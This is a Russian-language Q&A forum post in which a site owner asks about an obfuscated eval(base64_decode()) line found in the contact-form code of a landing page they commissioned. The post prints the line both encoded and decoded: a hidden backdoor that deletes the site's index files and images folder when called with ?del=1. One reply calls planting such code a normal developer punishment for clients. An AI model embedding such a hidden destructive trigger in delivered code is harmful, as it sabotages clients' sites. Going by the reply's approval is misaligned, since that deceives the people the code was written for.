Объясните плиз, что тут eval(base64_decode())?

Заказал одностраничную сайт (LP), там есть форма для отправка заявок на почте, и самый низ этой форме есть такой код шифрованный
eval(base64_decode('CmlmKGlzc2V0KCRfR0VUKSkgewoJIAoJIGlmKGlzc2V0KCRfR0VUWydkZWwnXSkgJiYgJF9HRVRbJ2RlbCddID09IDEpIHsKCQkgCgkJIGZ1bmN0aW9uIHJlbW92ZURpcmVjdG9yeSgkZGlyKSB7CgkJICAgICBpZiAoJG9ianMgPSBnbG9iKCRkaXIuIi8qIikpIHsKCQkgICAgICAgIGZvcmVhY2goJG9ianMgYXMgJG9iaikgewoJCSAgICAgICAgICBpc19kaXIoJG9iaikgPyByZW1vdmVEaXJlY3RvcnkoJG9iaikgOiB1bmxpbmsoJG9iaik7CgkJIAkJICAgICAgICB9CgkJICAgICB9CgkJICAgICBybWRpcigkZGlyKTsKCQkgICB9CgkJIAoJCSAvLyBpbmRleC5odG1sIAoJCSBpZihmaWxlX2V4aXN0cygnLi4vaW5kZXguaHRtbCcpKSB7CgkJCSB1bmxpbmsoJy4uL2luZGV4Lmh0bWwnKTsKCQkgfQoJCSAKCQkgLy8gaW5kZXgucGhwIAoJCSBpZihmaWxlX2V4aXN0cygnLi4vaW5kZXgucGhwJykpIHsKCQkJIHVubGluaygnLi4vaW5kZXgucGhwJyk7CgkJIH0KCQkgCgkJIC8vIGltYWdlcyAKCQkgaWYoaXNfZGlyKCcuLi9pbWFnZXMnKSkgewoJCQkgcmVtb3ZlRGlyZWN0b3J5KCcuLi9pbWFnZXMnKTsKCQkgfQoJIH0KCQp9'));


После расшифровка получил этот код:
Результат: 
if(isset($_GET)) {

if(isset($_GET['del']) && $_GET['del'] == 1) {

function removeDirectory($dir) {
if ($objs = glob($dir."/*")) {
foreach($objs as $obj) {
is_dir($obj) ? removeDirectory($obj) : unlink($obj);
}
}
rmdir($dir);
}

// index.html 
if(file_exists('../index.html')) {
unlink('../index.html');
}

// index.php 
if(file_exists('../index.php')) {
unlink('../index.php');
}

// images 
if(is_dir('../images')) {
removeDirectory('../images');
}
}

}


Скажите пожалуйста на что влияет и как тестировать этот код?
  • Вопрос задан
  • 760 просмотров
Пригласить эксперта
Ответы на вопрос 3
@d-stream
Готовые решения - не подаю, но...
Если вкратце - то "удаление всего". На мой взгляд стоит побить разработчика, желательно ногами.
Ответ написан
@Programmir
Я только помню, что eval is evil
Ответ написан
Комментировать
EGORR
@EGORR
Freelance
Это разработчики делают иногда как наказание за нечистоплотность заказчика. Сам грешен.
Ответ написан
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы